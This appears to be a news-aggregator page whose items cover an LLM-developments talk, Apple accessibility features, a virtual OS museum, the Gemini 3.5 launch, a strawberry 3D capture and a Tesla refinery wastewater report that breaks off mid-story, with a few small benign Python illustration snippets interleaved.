10 interesting stories served every morning and every evening.

The last six months in LLMs in five minutes

simonwillison.net

19th May 2026

I put to­gether these an­no­tated slides from my five minute light­ning talk at PyCon US 2026, us­ing the lat­est it­er­a­tion of my an­no­tated pre­sen­ta­tion tool.

#

I pre­sented this light­ning talk at PyCon US 2026, at­tempt­ing to sum­ma­rize the last six months of de­vel­op­ments in LLMs in five min­utes.

#

Six months is a pretty con­ve­nient time pe­riod to cover, be­cause it cap­tures what I’ve been call­ing the November 2025 in­flec­tion point. November was a crit­i­cal month in LLMs, es­pe­cially for cod­ing.

#

For one thing, the supposedly “best” model (depending mostly on vibes) changed hands five times between the three big providers.

#

As always, I’m using my “Generate an SVG of a pelican riding a bicycle” test to help illustrate the differences between the models.

Why this test? Because pel­i­cans are hard to draw, bi­cy­cles are hard to draw, pel­i­cans can’t ride bi­cy­cles… and there’s zero chance any AI lab would train a model for such a ridicu­lous task.

#

At the start of November the widely acknowledged “best” model was Claude Sonnet 4.5, released on 29th September. It drew me this pelican.

In November it was over­taken by GPT-5.1, then Gemini 3, then GPT-5.1 Codex Max, and then Anthropic took the crown back again with Claude Opus 4.5.

I think Gemini 3 drew the best pel­i­can out of this lot, but pel­i­cans aren’t every­thing. Most prac­ti­tion­ers will agree that Opus 4.5 held the crown for the next cou­ple of months.

#

It took a lit­tle while for this to be­come clear, but the real news from November was that the cod­ing agents got good.

OpenAI and Anthropic had spent most of 2025 run­ning Reinforcement Learning from Verifiable Rewards to in­crease the qual­ity of code writ­ten by their mod­els, es­pe­cially when paired up with their Codex and Claude Code agent har­nesses.

In November the re­sults of this work be­came ap­par­ent. Coding agents went from of­ten-work to mostly-work, cross­ing a qual­ity bar­rier where you could use them as a daily-dri­ver to get real work done, with­out need­ing to spend most of your time fix­ing their stu­pid mis­takes.

#

Also in November, this happened: the first commit to an obscure (back then) repo called “Warelay” by some guy called Pete.

#

Over the hol­i­day pe­riod, from December to January, a whole lot of us took ad­van­tage of the break to have a poke at these new mod­els and cod­ing agents and see what they could do.

They could do a lot! Some of us got a lit­tle bit over-ex­cited. I had my own short-lived bout of a form of LLM psy­chosis as I started spin­ning up wildly am­bi­tious pro­jects to see how far I could push them.

#

That play­ground demo shows JavaScript code run us­ing my mi­cro-javascript li­brary, in Python, run­ning in­side Pyodide, run­ning in WebAssembly, run­ning in JavaScript, run­ning in a browser!

It’s pretty cool! But did any­one out there need a buggy, slow, in­se­cure half-baked im­ple­men­ta­tion of JavaScript in Python?

They did not. I have quite a few other pro­jects from that hol­i­day pe­riod that I have since qui­etly re­tired!

#

On to February. Remember that Warelay pro­ject that had its first com­mit at the end of November?

#

In December and January it had gone through quite a few name changes… and by February it was tak­ing the world by storm un­der its fi­nal name, OpenClaw.

The amount of at­ten­tion it got is pretty as­ton­ish­ing for a pro­ject that was less than three months old.

#

OpenClaw is a “personal AI assistant”, and we actually got a generic term for these, based on NanoClaw and ZeroClaw and suchlike… they’re called Claws.

#

Mac Minis started to sell out around Silicon Valley, be­cause peo­ple were buy­ing them to run their Claws.

Drew Breunig joked to me that this is be­cause they’re the new dig­i­tal pets, and a Mac Mini is the per­fect aquar­ium for your Claw.

#

My favourite metaphor for Claws is Alfred Molina’s Doc Ock in the 2004 movie Spider-Man 2. His claws were pow­ered by AI, and were per­fectly safe pro­vided noth­ing dam­aged his in­hibitor chip… af­ter which they turned evil and took over.

#

Also in February: Gemini 3.1 Pro came out, and drew me a re­ally good pel­i­can rid­ing a bi­cy­cle. Look at this! It’s even got a fish in its bas­ket.

#

And then Google’s Jeff Dean tweeted this video of an an­i­mated pel­i­can rid­ing a bi­cy­cle, plus a frog on a penny-far­thing and a gi­raffe dri­ving a tiny car and an os­trich on roller skates and a tur­tle kick­flip­ping a skate­board and a dachs­hund dri­ving a stretch lim­ou­sine.

So maybe the AI labs have been pay­ing at­ten­tion af­ter all!

#

A lot of stuff hap­pened just in the past month.

#

Google re­leased the Gemma 4 se­ries of mod­els, which are the most ca­pa­ble open weight mod­els I’ve seen from a US com­pany.

#

Also last month, Chinese AI lab GLM came out with GLM-5.1—an open weight 1.5TB mon­ster! This is a very ef­fec­tive model… if you can af­ford the hard­ware to run it.

#

GLM-5.1 drew me this very com­pe­tent pel­i­can on a bi­cy­cle.

#

… though when it tried to an­i­mate it the bi­cy­cle bounced off into the top and the bi­cy­cle got warped.

#

Charles on Bluesky suggested I try it with a “North Virginia Opossum on an E-scooter”.

#

And it did this! I’ve tried this on other models and they don’t even come close. “Cruising the commonwealth since dusk” is perfect. It’s animated too.

#

Here’s that Claude Sonnet 4.5 pel­i­can from September for com­par­i­son.

#

So those were the two main themes of the past six months. The cod­ing agents got re­ally good… and the lap­top-avail­able mod­els, while a lot weaker than the fron­tier, have started wildly out­per­form­ing ex­pec­ta­tions.

Apple unveils new accessibility features, and updates powered by Apple Intelligence

www.apple.com

Apple also an­nounced new fea­tures for con­trol­ling power wheel­chairs with Apple Vision Pro and gen­er­at­ing sub­ti­tles across the Apple ecosys­tem, all com­ing later this year

VoiceOver and Magnifier Can Explore More

A Mac screen dis­play­ing a source doc­u­ment with a com­plex lay­out and small text.

The Mac screen show­ing the doc­u­ment re­for­mat­ted by Accessibility Reader with larger, clearer text in a sin­gle col­umn.

Generated Subtitles for Video

Additional Updates

Vehicle Motion Cues come to vi­sionOS, which can help re­duce mo­tion sick­ness for peo­ple who use Apple Vision Pro as a pas­sen­ger in a mov­ing ve­hi­cle. Vision Pro will also sup­port face ges­tures for per­form­ing taps and sys­tem ac­tions, plus a new way to se­lect el­e­ments with one’s eyes while us­ing Dwell Control.

Touch Accommodations pro­vide a new way to per­son­al­ize setup in iOS and iPa­dOS.

Made for iPhone hear­ing aids pair and hand off be­tween Apple de­vices more re­li­ably, with an im­proved setup ex­pe­ri­ence in iOS, iPa­dOS, ma­cOS, and vi­sionOS.

Larger Text sup­port is com­ing to tvOS, so view­ers who have low vi­sion can in­crease on­screen text size to be eas­ier to read.

The Apple TV interface shows a menu for the show “Prehistoric Planet: Ice Age” with the standard text size.

The Apple TV in­ter­face shows a con­trol for in­creas­ing the text size.

The Apple TV interface shows a menu for the show “Prehistoric Planet: Ice Age” with a larger text size.

Name Recognition, which can no­tify users who are deaf or hard of hear­ing if some­one says their name, works across more than 50 lan­guages glob­ally.

For sign lan­guage in­ter­pre­ta­tion app de­vel­op­ers, a new API sup­ports users in adding a hu­man in­ter­preter to an on­go­ing FaceTime video call.

Those with dif­fi­culty in­ter­act­ing with tra­di­tional con­trollers can now con­nect the Sony Access con­troller as a game con­troller with iOS, iPa­dOS, and ma­cOS. Users can con­fig­ure the thumb­stick, nine built-in but­tons, and up to four ad­di­tional ex­ter­nal but­tons or spe­cialty switches to per­son­al­ize lay­out. They can also com­bine two con­trollers for a deeply per­son­al­ized gam­ing ex­pe­ri­ence.


Apple Intelligence is avail­able in beta with sup­port for these lan­guages: English, Danish, Dutch, French, German, Italian, Norwegian, Portuguese, Spanish, Swedish, Turkish, Vietnamese, Chinese (simplified), Chinese (traditional), Japanese, and Korean. Some fea­tures may not be avail­able in all re­gions or lan­guages. For fea­ture and lan­guage avail­abil­ity and sys­tem re­quire­ments, see sup­port.ap­ple.com/​en-us/​121115.

VoiceOver and Magnifier should not be re­lied upon in cir­cum­stances where one could be harmed or in­jured, in high-risk sit­u­a­tions, for nav­i­ga­tion, or for the di­ag­no­sis or treat­ment of any med­ical con­di­tion.

Voice Control pow­ered by Apple Intelligence will be avail­able in English in the U.S., Canada, the UK, and Australia.

Generated sub­ti­tles will be avail­able in English in the U.S. and Canada.

The fea­ture and Apple Vision Pro are in­tended for use in con­trolled en­vi­ron­ments. For more in­for­ma­tion, visit sup­port.ap­ple.com/​en-us/​118507.

A wired con­nec­tion re­quires the pur­chase of the Apple Vision Pro Developer Strap.

Customers can pur­chase the Hikawa Grip & Stand for iPhone on ap­ple.com in Australia, Austria, Belgium, Canada, China, Denmark, France, Hong Kong, Italy, Japan, the Netherlands, Singapore, South Korea, Spain, Sweden, Switzerland, Taiwan, the United Arab Emirates, the UK, and the U.S.

The Virtual OS Museum

virtualosmuseum.org

This is a vir­tual mu­seum of op­er­at­ing sys­tems (and stand­alone ap­pli­ca­tions) run­ning un­der em­u­la­tion, im­ple­mented as a Linux VM for QEMU, VirtualBox, or UTM.

A cus­tom em­u­la­tor-in­de­pen­dent launcher is pro­vided, and all OSes and em­u­la­tors are pre-in­stalled and pre-con­fig­ured. The launcher in­cludes a snap­shot fea­ture to quickly re­vert bro­ken in­stal­la­tions back to a work­ing state. Hypervisor in­stallers and short­cuts to run the VM on Windows, ma­cOS, and Linux are also in­cluded.

Want to see the ear­li­est res­i­dent mon­i­tors? The an­ces­tor of all mod­ern OSes (CTSS)? The ear­li­est ver­sions of Unix? The first OS with a desk­top metaphor GUI (Xerox Star Pilot/ViewPoint)? Early ver­sions of main­stream OSes? If you want to ex­plore his­tor­i­cal OSes and plat­forms with­out hav­ing to worry about con­fig­ur­ing/​in­stalling em­u­la­tors and OSes or cor­rupt­ing em­u­lated in­stal­la­tions, you’ve come to the right place.

Just about every well-known OS and plat­form (and also a lot of ob­scure ones) is in­cluded in some form, span­ning the en­tire his­tory of stored-pro­gram com­put­ing from the Manchester Baby of 1948 (the first stored-pro­gram com­puter) to the pre­sent day.

The cat­a­logue cov­ers, among many other things:

The ear­li­est main­frames: Manchester Baby test/​demo pro­grams, Mark 1 Scheme A/B/C/T (the ear­li­est ex­am­ples of sys­tem soft­ware that could be con­sid­ered as an OS), var­i­ous EDSAC soft­ware, etc.

Later main­frames and mini­com­put­ers: CTSS, MVS, VM/370, TOPS-10/20, ITS, Multics, RSX, RSTS, and more

Workstations and Unix vari­ants: PERQ OSes, SunOS, IRIX, OSF/1, A/UX, NeXTSTEP, Plan 9, var­i­ous BSDs, plus Linux dis­tri­b­u­tions across the decades, and more

Home com­put­ers: var­i­ous CP/M vari­ants, Apple II, Commodore 8-bit ma­chines, Atari 8-bit, MSX, Tandy TRS-80, BBC Micro, ZX Spectrum, Sharp MZ, and more

Personal com­puter op­er­at­ing sys­tems: var­i­ous DOS vari­ants, OS/2, BeOS, Windows from 1.0 to early Longhorn be­tas, clas­sic Mac OS through Mac OS X 10.5 PPC, and more

Mobile and em­bed­ded: PalmOS, EPOC/Symbian, Windows CE, Newton OS, early Android and iOS where em­u­la­tion per­mits, QNX, etc.

Research and ob­scure sys­tems: ZetaLisp, Smalltalk en­vi­ron­ments, Oberon, Plan 9, and many more that few peo­ple now have ever booted

If a work­ing ver­sion of an op­er­at­ing sys­tem ex­ists some­where, the goal is to have it here, in a form any­one can run on a rea­son­ably mod­ern lap­top/​desk­top.

By the Numbers

1700+ installs

250+ platforms

570+ distinct OSes

1948-now era

Downloads

Both a full and a lite ver­sion are avail­able. The full ver­sion ships with every­thing pre-down­loaded and runs of­fline. The lite ver­sion down­loads disk/​tape/​etc. im­ages for guest VMs the first time they are run. Automatic and man­ual up­dates are sup­ported on both edi­tions so new in­stal­la­tions land with­out re-down­load­ing the whole VM.
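The download-on-first-run behaviour described for the lite version can be illustrated with a small caching sketch. This is not the launcher's actual code: `ensure_image`, `fake_fetch`, and the file name `guest.img` are hypothetical names chosen for illustration, and the real launcher may work quite differently.

```python
import tempfile
from pathlib import Path
from typing import Callable


def ensure_image(cache_dir: Path, name: str, fetch: Callable[[str], bytes]) -> Path:
    """Return the local path of an image, fetching it only if it is not cached yet."""
    target = cache_dir / name
    if not target.exists():
        cache_dir.mkdir(parents=True, exist_ok=True)
        # Write to a temporary name first so an interrupted download
        # is never mistaken for a complete image.
        partial = target.with_name(target.name + ".part")
        partial.write_bytes(fetch(name))
        partial.replace(target)
    return target


# Hypothetical stand-in for a network download; records each call.
calls = []


def fake_fetch(name: str) -> bytes:
    calls.append(name)
    return b"disk image bytes"


with tempfile.TemporaryDirectory() as tmp:
    cache = Path(tmp) / "images"
    first = ensure_image(cache, "guest.img", fake_fetch)   # first run: fetches
    second = ensure_image(cache, "guest.img", fake_fetch)  # later run: cache hit
    fetched_once = len(calls) == 1 and first == second

print("fetched once:", fetched_once)
```

In this sketch the second call returns the cached file without touching the fetch function, which is the property that lets a lite install start small and grow only as guests are actually launched.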

Download the Virtual OS Museum

Screenshots

0. Launcher main win­dow

1. Launcher VM info

2. Unix PC SVR2 and XVM RSX

AFROS (XaAES) 8.12 – 00 TeraDesk

AO-DOS 2.10 – 00 Intro

ATT Unix PC System V R2 3.51m - 00 File Manager and Terminal

A_UX 3.1.1 – 00 Finder with util­i­ties

Amiga UNIX (AMIX) 2.1c - 00 OpenLook desk­top with ap­pli­ca­tions

CP_M for PSI98 2.2 (6.31-Z) - 00 DIR

CSIDOS 3.32 – 00 Intro

Coherent 4.2.14 – 00 olwm with ap­pli­ca­tions

Domain_OS SR10.4 – 01 VUE desk­top

E_OS LX 0.2.5 – 00 Terminal

FlexOS 2.3 (COROS LS-B 4.01) - 03 About

GNO_ME 2.0.6 – 01 TMTerm

HP-UX 11i v1 (B.11.11) - 00 CDE with util­i­ties

Human68K 3.02 – 00 LHES

IBM 1130 DMS V2M12 - 00 LET list­ing

IBM OS_2 (Extended Edition) 1.1 – 00 Desktop Manager

IRIX 6.5.22m - 00 IMD with ap­pli­ca­tions

Inferno Fourth Edition (20100115) - 00 GUI with ap­pli­ca­tions

LisaOS 3.1 – 02 LisaDraw

MOS for BBC Master Compact 5.10 (Base) - 02 Desktop

Mac OS (Classic) 1.0 al­pha; Sony Test (System 7.0’, Finder 1983 – 10-04) - 00 Finder

Mac OS 9.0.4 – 00 Finder, Internet Explorer, and Help

Mach386 2.6 1.0 (X108_MSD) - 00 X11 with ap­pli­ca­tions

Minerva 1.98 (QL_E (shares disk im­ages with SMSQ_E QL_E)) - 00 Desktop with ap­pli­ca­tions

Minix 3.4.0rc6 – 00 X11 Terminal and Links

NeXTStep (68k) 3.3 – 00 Desktop with ap­pli­ca­tions

OS-9_x86 (a.k.a. OS-9000_x86) 6.1 – 00 XiBase

PSI-OS 12.2 – 00 Start

Plan 9 4th Edition - 01 acme filesys­tem server

QNX 1.2 – 00 boot

RISC OS 3.11 (Minimal (Old boot)) - 00 Desktop with ap­pli­ca­tions

SILLIAC soft­ware col­lec­tion - 00 Blob demo

SINIX (PC-X) 1.2 – 01 Login Prompt

SX-WINDOW 3.1 – 00 Desktop

Sharp Personal CP_M for MZ-2500 (MZ-6Z001) 1.0a - 00 VCCP

Softlanding Linux System 1.0 – 00 ls un­ame and ker­nel source

Solaris_SPARC 9 (s9_58shwpl3) - 00 CDE ter­mi­nal help and file man­ager

Syllable 0.5.2 – 00 Desktop with ap­pli­ca­tions

SymbOS 1.0 Beta - 01 About

Tru64 UNIX 5.1B - 00 CDE with util­i­ties

ULTRIX_VAX 4.0 – 00 DECwindows with ap­pli­ca­tions

UNICOS 10.0.0.2 – 01 X11 with util­i­ties

More screen­shots

Why this ex­ists

While the state of soft­ware preser­va­tion has im­proved sig­nif­i­cantly over the past two decades, many of the ex­ist­ing soft­ware preser­va­tion pro­jects are still not par­tic­u­larly ac­ces­si­ble.

When I started col­lect­ing em­u­la­tor im­ages (2003), there were only a few small archives of soft­ware im­ages and the cor­re­spond­ing doc­u­men­ta­tion, and rel­a­tively few em­u­la­tors for any­thing other than well-known con­sumer-ori­ented plat­forms. Nowadays there are many large archives of his­tor­i­cal soft­ware and doc­u­men­ta­tion, and a lot of em­u­la­tors for even a lot of very ob­scure plat­forms.

However, while such ef­forts are valu­able when it comes to keep­ing his­tor­i­cal soft­ware avail­able and runnable (and with­out them this pro­ject would have never been pos­si­ble; see the cred­its page for a list of em­u­la­tors, pre-in­stalled im­ages, and me­dia archives I have used), it of­ten still takes time and ef­fort to get runnable VM in­stal­la­tions from them. OSes may have com­pli­cated in­stall pro­ce­dures. Some may de­pend on par­tic­u­lar de­vice con­fig­u­ra­tions within an em­u­la­tor. Some will only run in cer­tain em­u­la­tor ver­sions, break­ing in later ones due to re­gres­sions. Some em­u­la­tors might have com­plex con­fig­u­ra­tion files, or may re­quire a spe­cific en­vi­ron­ment on the host sys­tem.

This project is an attempt to keep reachable as much of the history that’s been preserved in various places as possible. Not theoretically reachable. Not “bootable in principle if you assemble the right toolchain on a Tuesday.” Reachable. You click an entry, it runs, and where possible it runs with software of the era already loaded the way someone might actually have used the machine at the time.

The work be­hind it

This is the re­sult of over 20 years of col­lect­ing. OS in­stal­la­tions have been sourced from var­i­ous places. Some have been down­loaded as pre-in­stalled im­ages, whereas oth­ers were in­stalled from im­ages of orig­i­nal in­stall me­dia. Some were in­stalled in less than an hour, whereas oth­ers took al­most a week.

A de­cent num­ber only run in par­tic­u­lar em­u­la­tor ver­sions due to re­gres­sions in later ver­sions, and some em­u­la­tors needed mi­nor patches to run on mod­ern Linux or to play nice with the launcher. A few em­u­la­tors have been patched to run OSes that were pre­vi­ously bro­ken.

Many in­stal­la­tions also in­clude var­i­ous add-on soft­ware - ap­pli­ca­tions, de­vel­op­ment tools, games, util­i­ties, etc. - set up the way it ac­tu­ally might have been used.

This is still far from fin­ished; I have many more im­ages sit­ting around that I have yet to in­stall and em­u­la­tors I want to fix; check out my YouTube chan­nel, blog, or BlueSky to see what I’m cur­rently work­ing on.

Support the pro­ject

This is a per­sonal pro­ject, run and cu­rated by one per­son, sus­tained by pa­tience and time. If you find it in­ter­est­ing, the eas­i­est ways to sup­port it are:

Patreon for on­go­ing sup­port

Ko-fi for one-off con­tri­bu­tions

Discord/Fluxer to talk about it, ask ques­tions, or sug­gest new plat­forms/​OSes to add (new en­tries may not be added im­me­di­ately since I’ve got a lot of stuff to add)

GitLab to sub­mit bug re­ports or patches re­lated to the launcher and scripts

Telling some­one who works on, writes about, or stud­ies the his­tory of com­put­ing that this ex­ists

Gemini 3.5: frontier intelligence with action

blog.google

May 19, 2026

Gemini 3.5 is built to help you ex­e­cute com­plex, agen­tic work­flows.

Today, we’re in­tro­duc­ing Gemini 3.5, our lat­est fam­ily of mod­els com­bin­ing fron­tier in­tel­li­gence with ac­tion. This rep­re­sents a ma­jor leap for­ward in build­ing more ca­pa­ble, in­tel­li­gent agents. We’re kick­ing off the se­ries by re­leas­ing 3.5 Flash. It de­liv­ers fron­tier per­for­mance for agents and cod­ing, ex­celling at com­plex long-hori­zon tasks that de­liver real-world util­ity.

3.5 Flash is avail­able to­day to bil­lions of peo­ple glob­ally:

For every­one via the Gemini app and AI Mode in Google Search

For de­vel­op­ers in our agent-first de­vel­op­ment plat­form Google Antigravity and Gemini API in Google AI Studio and Android Studio

For en­ter­prises in Gemini Enterprise Agent Platform and Gemini Enterprise.

We’re also hard at work on 3.5 Pro. It’s al­ready be­ing used in­ter­nally, and we look for­ward to rolling it out next month.

3.5 Flash: fron­tier per­for­mance for agents and cod­ing

Gemini 3.5 Flash de­liv­ers in­tel­li­gence that ri­vals large flag­ship mod­els on mul­ti­ple di­men­sions, at the speeds you have come to ex­pect from the Flash se­ries. It’s our strongest agen­tic and cod­ing model yet, out­per­form­ing Gemini 3.1 Pro on chal­leng­ing cod­ing and agen­tic bench­marks like Terminal-Bench 2.1 (76.2%), GDPval-AA (1656 Elo) and MCP Atlas (83.6%), and lead­ing in mul­ti­modal un­der­stand­ing (84.2% on CharXiv Reasoning). When look­ing at out­put to­kens per sec­ond, it is 4 times faster than other fron­tier mod­els.

Landing in the top-right quad­rant of the Artificial Analysis in­dex, 3.5 Flash de­liv­ers fron­tier-level in­tel­li­gence at ex­cep­tional speed — prov­ing you no longer have to trade qual­ity for la­tency.

3.5 Flash: agen­tic tasks at scale

This bal­ance of speed and per­for­mance makes 3.5 Flash ideal for tack­ling long-hori­zon agen­tic tasks. What used to take a de­vel­oper days or an au­di­tor weeks, 3.5 Flash can now help com­plete in a frac­tion of the time, of­ten at less than half the cost of other fron­tier mod­els. It rapidly plans, builds and it­er­ates to solve real-world prob­lems, whether it’s de­vel­op­ing new ap­pli­ca­tions, main­tain­ing code­bases or help­ing to pre­pare fi­nan­cial doc­u­ments.

When cou­pled with the up­dated Antigravity har­ness, 3.5 Flash be­comes a pow­er­ful en­gine for de­ploy­ing col­lab­o­ra­tive sub­agents to tackle prob­lems at scale for the most de­mand­ing use cases. Under su­per­vi­sion, it can re­li­ably ex­e­cute multi-step work­flows and cod­ing tasks while sus­tain­ing fron­tier per­for­mance.

Powered by Antigravity, 3.5 Flash ex­e­cutes multi-step work­flows to au­to­mat­i­cally re­name and cat­e­go­rize un­struc­tured as­sets based on dy­namic cri­te­ria.

Leveraging Antigravity, 3.5 Flash uses two agents to syn­the­size the AlphaZero pa­per and code a fully playable game in six hours.

3.5 Flash uses the Antigravity har­ness to trans­form a messy legacy code­base to Next.js.

3.5 Flash uses sub­agents to cre­ate new city land­scapes in Antigravity.

3.5 Flash uses two agents: a builder and a player, work­ing in a rapid self-im­prove­ment loop to de­velop a game in Antigravity.

Building on the strong mul­ti­modal foun­da­tion of Gemini 3, 3.5 Flash gen­er­ates richer, more in­ter­ac­tive web UIs and graph­ics.

3.5 Flash cre­ates in­ter­ac­tive an­i­ma­tions for a re­search pa­per on AI Studio.

3.5 Flash turns a plain text de­scrip­tion into in­ter­ac­tive hard­ware on AI Studio.

3.5 Flash ex­e­cutes mul­ti­ple con­cepts in par­al­lel to build a full brand­ing con­cept for a school fundraiser on AI Studio.

3.5 Flash gen­er­ates dif­fer­ent UX ap­proaches for a check­out flow in just 60 sec­onds on AI Studio.

3.5 Flash: real-world im­pact

3.5 Flash’s real-world agen­tic ca­pa­bil­i­ties are al­ready dri­ving mean­ing­ful progress for our de­vel­op­ers and en­ter­prises alike. In de­vel­op­ing the 3.5 model se­ries, we worked closely with in­dus­try part­ners to un­der­stand where toil and com­plex­ity arose in their work­flows. Partners are see­ing mean­ing­ful im­pact — from banks and fin­techs au­tomat­ing multi-week work­flows to data sci­ence teams un­earthing in­sights amidst com­plex data en­vi­ron­ments.

Shopify is run­ning sub­agents in par­al­lel to an­a­lyze com­plex data over a long hori­zon for more ac­cu­rate mer­chant growth fore­casts at a global scale.

Macquarie Bank is pi­lot­ing how 3.5 Flash can ac­cel­er­ate cus­tomer on­board­ing by rea­son­ing over com­plex 100+ page doc­u­ments, re­triev­ing rel­e­vant in­for­ma­tion and mak­ing re­li­able rec­om­men­da­tions with low la­tency.

Salesforce is in­te­grat­ing 3.5 Flash into Agentforce to re­li­ably au­to­mate com­pli­cated en­ter­prise tasks by de­ploy­ing mul­ti­ple sub­agents that re­tain con­text and ex­e­cute com­plex, multi-turn tool call­ing.

3.5 Flash is help­ing Ramp en­able smarter, more re­li­able OCR through mul­ti­modal un­der­stand­ing of com­plex in­voices com­bined with rea­son­ing over his­tor­i­cal pat­terns.

Xero is de­ploy­ing agents to au­tonomously man­age com­plex, multi-week work­flows, such as iden­ti­fy­ing sup­pli­ers and gath­er­ing in­for­ma­tion for 1099 tax forms, en­abling small busi­nesses to au­to­mate te­dious ad­min tasks.

Databricks is us­ing agen­tic work­flows to mon­i­tor and re­trieve real-time in­for­ma­tion, rea­son across mas­sive datasets to di­ag­nose is­sues, iden­tify fixes and pro­pose so­lu­tions for data sci­en­tists.

Personal AI agents: built with 3.5 Flash

3.5 Flash is now the de­fault model for the Gemini app and AI Mode in Search glob­ally. At I/O to­day, we showed how its agen­tic ca­pa­bil­i­ties are pow­er­ing new fea­tures to bring fron­tier-level in­tel­li­gence to your daily life.

The new Gemini Spark, your per­sonal AI agent, uses 3.5 Flash. It runs 24/7, help­ing you nav­i­gate your dig­i­tal life, tak­ing ac­tion on your be­half while un­der your di­rec­tion. We’re start­ing to roll out Gemini Spark to trusted testers to­day, and we’re plan­ning on bring­ing the Beta to Google AI Ultra sub­scribers in the US next week.

Gemini Spark uses 3.5 Flash to help ac­com­plish these tasks

The en­hanced agen­tic cod­ing ca­pa­bil­i­ties of 3.5 Flash are also de­liv­er­ing even more in­tel­li­gent ex­pe­ri­ences across Search, from in­tro­duc­ing new in­for­ma­tion agents that work for you 24/7 to un­lock­ing more dy­namic gen­er­a­tive UI ex­pe­ri­ences. Learn more in our blog post.

Search lever­ages 3.5 Flash to build an in­ter­ac­tive vi­sual ex­plain­ing Gyroid pat­terns.

Gemini 3.5: built with fron­tier safe­guards

Gemini 3.5 was developed in accordance with our Frontier Safety Framework. We have strengthened our cyber and CBRN safeguards, which means it’s less likely both to generate harmful content and to mistakenly refuse to answer safe queries. We achieve this with new, more advanced safety training and mitigations, including interpretability tools that help check and understand the AI’s inner reasoning before it provides a response.

3.5 Flash is avail­able to­day

Gemini 3.5 Flash is gen­er­ally avail­able via Google Antigravity, the Gemini API in Google AI Studio and Android Studio, Gemini Enterprise Agent Platform and Gemini Enterprise. It’s also now avail­able to every­one in the Gemini app and AI Mode in Search. On be­half of the en­tire Gemini team, we can’t wait to see what you build.

Strawberry

superspl.at

Shot from 90 per­spec­tives, 88 fo­cus stacked im­ages each. Nikon Z8, full frame, f/​7.1, ex­po­sure 1/160, ISO 100, Laowa 180mm macro lens, with LED light and blue­screen.
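As a quick worked figure for the capture described above, the sketch below multiplies out the numbers given in the caption. It assumes each 88-frame focus stack is merged into a single image per perspective before training; the caption does not say this explicitly, so treat the "stacked images" count as an assumption.

```python
# Figures taken from the caption above.
PERSPECTIVES = 90
FRAMES_PER_STACK = 88


def total_source_frames(perspectives: int, frames_per_stack: int) -> int:
    """Raw exposures captured before focus stacking."""
    return perspectives * frames_per_stack


raw_frames = total_source_frames(PERSPECTIVES, FRAMES_PER_STACK)

# Assumption: one merged image per perspective after focus stacking.
stacked_images = PERSPECTIVES

print(f"{raw_frames} raw frames -> {stacked_images} stacked images")
```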

Training was done in slang-splat: https://​github.com/​Michael­Moroz/​slang-splat

You can down­load it un­der CC BY li­cense, but at­tri­bu­tion is ap­pre­ci­ated rather than re­quired. You may use this work with­out at­tri­bu­tion.

The COLMAP dataset is also avail­able (free) on my Patreon.

www.pa­treon.com/​Dany­Bit­tel

A Texas Drainage District Walked Its Ditch on a Routine Inspection. They Found a Pipe They Didn't Recognize Discharging Black Liquid From Tesla's $1 Billion Lithium Refinery

www.autonocion.com

Drainage district workers in Nueces County, Texas, were doing routine maintenance on a ditch outside Robstown in January 2026 when they noticed something they had not seen before. A pipe they did not recognize, stretched across an easement they oversee, was discharging dark liquid into the ditch they manage. “Very dark and murky,” is how Steve Ray, a consultant for the drainage district, described it to KRIS 6 News. “I would say it was actually black. We’re used to seeing good running water, and so we didn’t know exactly what it was.”

The pipe belonged to Tesla. The dark liquid was wastewater from the company’s nearly $1 billion lithium refinery, which began operations in December 2024 and was, at the time, the first commercial-scale spodumene-to-lithium-hydroxide refinery in North America. Tesla had marketed the plant for years as an “acid-free clean process,” promising sand and limestone as the main byproducts. The drainage district had not been told that 231,000 gallons of treated wastewater per day would be flowing through its infrastructure.

What hap­pened next, across the four months that fol­lowed, is one of the more un­com­fort­able sto­ry­lines in the American elec­tric ve­hi­cle sup­ply chain right now, and al­most no main­stream US au­to­mo­tive press has touched it.

How the drainage dis­trict found out about the pipe

The Texas Commission on Environmental Quality, the state en­vi­ron­men­tal reg­u­la­tor known as TCEQ, had qui­etly is­sued Tesla a waste­water dis­charge per­mit on January 15, 2025. The per­mit, a Texas Pollutant Discharge Elimination System au­tho­riza­tion known as TPDES, al­lowed up to 231,000 gal­lons of treated waste­water per day to be dis­charged into an un­named ditch that flows into Petronila Creek and from there into Baffin Bay, a long­time South Texas salt­wa­ter fish­ing des­ti­na­tion.
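To put the permitted volume in other units, here is a small conversion sketch. The 231,000 gallons per day figure is the permit maximum quoted above, not a measured flow, and the yearly total assumes discharge at that ceiling every day of a 365-day year, which the article does not claim.

```python
LITERS_PER_US_GALLON = 3.785411784  # exact definition of the US liquid gallon
PERMIT_LIMIT_GALLONS_PER_DAY = 231_000  # daily maximum quoted in the article


def gallons_to_liters(gallons: float) -> float:
    """Convert US liquid gallons to liters."""
    return gallons * LITERS_PER_US_GALLON


liters_per_day = gallons_to_liters(PERMIT_LIMIT_GALLONS_PER_DAY)

# Upper bound only: assumes the permit ceiling is reached every day.
gallons_per_year = PERMIT_LIMIT_GALLONS_PER_DAY * 365

print(f"{liters_per_day:,.0f} liters per day")
print(f"{gallons_per_year:,} gallons per year")
```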

What it did not do, ex­plic­itly, was grant Tesla the right to use pub­lic or pri­vate prop­erty for waste­water con­veyance. The drainage dis­trict that man­ages the ditch the pipe was dis­charg­ing into was never no­ti­fied that the per­mit ex­isted. Its work­ers found out the way drainage dis­trict work­ers in any small Texas county find out about things: by walk­ing the ditch and see­ing some­thing new.

They filed two com­plaints with TCEQ in January and February 2026. A state in­ves­ti­ga­tor vis­ited on February 12, sam­pled the wa­ter flow­ing from Tesla’s out­fall pipe, ran the stan­dard panel of con­ven­tional pol­lu­tants: dis­solved solids, chlo­rides, sul­fates, oil and grease, tem­per­a­ture, dis­solved oxy­gen. Everything in that panel came back in­side the bounds of Tesla’s per­mit. TCEQ ap­proved its in­ves­ti­ga­tion re­port on March 20, find­ing no per­mit vi­o­la­tion.

TCEQ did not test for heavy metals. Aref Mazloum, a volunteer engineer consulting for the drainage district who has also recently joined TCEQ’s water supply division, later explained to the Houston Chronicle that heavy metals were not tested because they had not been part of the original complaint the district filed. The permit also did not require any monitoring of lithium itself, which, as the Texas Tribune later noted, is the primary material the facility was built to process.

What the drainage dis­tric­t’s lab ac­tu­ally found

